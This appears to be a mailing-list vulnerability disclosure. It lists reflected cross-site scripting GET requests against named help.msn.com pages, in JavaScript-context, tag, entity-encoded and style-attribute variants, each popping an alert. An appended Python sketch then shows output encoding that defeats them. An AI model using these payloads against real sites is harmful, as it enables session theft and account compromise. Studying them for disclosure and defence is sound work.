From: contact_jamie_fisher at yahoo.co.uk (jamie fisher)
Subject: help.msn.com

This is gonna be quick'n'dirty.  My dinner is almost cooked...
 
More XSS for MSN to add to the list:
 
1. Cross site scripting (In JavaScript context)
 
http://help.msn.com/en_au/DirectedHelpControls.asp
 
1.1 GET /en_au/DirectedHelpControls.asp?DataMarket=%27%2Balert(%27Bills Momma%27)%2B%27&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
1.2 GET /en_au/DirectedHelpControls.asp?DataMarket=%22%2Balert(%27Bills Momma%27)%2B%22&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
1.3 /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=%27%2Balert(%27Bills Momma%27)%2B%27&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
1.4 GET /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=%22%2Balert(%27Bills Momma%27)%2B%22&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
1.5 GET /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=%27%2Balert(%27Bills Momma%27)%2B%27 HTTP/1.0
 
2 Cross site scripting (Standard variants)
 
http://help.msn.com/EN_AU/Search/xfind_utf8.asp
 
2.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>"><script>alert("Bills Momma")</script>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
2.2 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>%22%27><img%20src%3d%22javascript:alert(%27Bills Momma%27)%22>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
2.3 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>"><script>alert("Bills Momma")</script>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0
 
2.4 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>%22%27><img%20src%3d%22javascript:alert(%27Appscan%20-%20CSS%20attack%20may%20be%20used%27)%22>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0
 
3 Cross site scripting (Standard variants)
 
http://help.msn.com/en_au/DirectedHelpControls.asp
 
3.1 GET /en_au/DirectedHelpControls.asp?DataMarket=>"><script>alert("Bills Momma")</script>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
3.2 GET /en_au/DirectedHelpControls.asp?DataMarket=>%22%27><img%20src%3d%22javascript:alert(%27Bills Momma%27)%22>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
4 Cross site scripting using HTML entities
 
http://help.msn.com/EN_AU/Search/xfind_utf8.asp
 
4.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
4.2 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0
 
5 Cross site scripting using HTML entities
 
http://help.msn.com/en_au/DirectedHelpControls.asp
 
5.1 GET /en_au/DirectedHelpControls.asp?DataMarket=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
6 Cross site scripting without using '<' and '>' symbols
 
http://help.msn.com/EN_AU/Search/xfind_utf8.asp
 
6.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
6.2 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0
 
7 Cross site scripting without using '<' and '>' symbols
 
http://help.msn.com/en_au/directedhelp.asp
 
7.1 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
7.2 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=%22%20style%3D%22background:url(javascript:alert(%Bills%20Momma%27))%22%20OA%3D%22&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
7.3 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
7.4 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22 HTTP/1.0
 
I won't say how to fix.  The last time I ran XSS by a website (Kevin Mitnick's), some nematode <http://nematode.unl.edu/wormgen.htm> refuted my mitigating fix.  Bearing in mind the triviality of XSS I really shouldn't have bothered; but I did.
 
<!--# Greets:
 Hulk Hogan, Bills Momma, the homeless guy I pass on my way into the office (who incidentally, will code for food), my keypad, and all the lads on the contract where I am currently -->
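Added example, not part of the post: a context-aware output-encoding sketch in Python, using a hypothetical template that stands in for the ASP page (the real DirectedHelpControls.asp markup is not on the page), showing why each payload class listed above stays inert once every reflected parameter is encoded for the context it lands in (JavaScript string literal, HTML attribute value, URL attribute).

```python
import html
import json
from urllib.parse import urlsplit


def js_string(value: str) -> str:
    """Encode for use inside a JS string literal (single- or double-quoted).
    json.dumps escapes backslash and double quote; we additionally escape the
    single quote (the delimiter the 1.x payloads break out of) and < > & so a
    literal '</script>' can never terminate the surrounding script block."""
    encoded = json.dumps(value)[1:-1]          # strip json's own surrounding quotes
    for ch, esc in (("'", "\\u0027"), ("<", "\\u003c"),
                    (">", "\\u003e"), ("&", "\\u0026")):
        encoded = encoded.replace(ch, esc)
    return encoded


def html_attr(value: str) -> str:
    """Encode for use inside a quoted HTML attribute value.
    & becomes &amp;, so attacker-supplied entities such as &#x6a;&#x61;...
    (the section 4/5 payloads) stay literal text instead of decoding to a
    javascript: URL, and quotes cannot close the attribute (sections 6/7)."""
    return html.escape(value, quote=True)


def safe_http_url(value: str) -> str:
    """Allow only absolute http(s) URLs for link targets such as ContactUsURL;
    javascript: and bare quote-breakout strings are replaced by a placeholder."""
    parts = urlsplit(value)
    if parts.scheme.lower() in ("http", "https") and parts.netloc:
        return value
    return "#"


def render(data_market: str, its_file: str, contact_url: str) -> str:
    """Constructed template (assumption, not the original page) that reflects
    the same parameter names the post lists into each risky context."""
    return (
        '<script>var market = \'%s\'; var its = "%s";</script>\n'
        '<input type="hidden" name="DataMarket" value="%s">\n'
        '<a href="%s">Contact us</a>'
    ) % (js_string(data_market), js_string(its_file),
         html_attr(data_market), html_attr(safe_http_url(contact_url)))
```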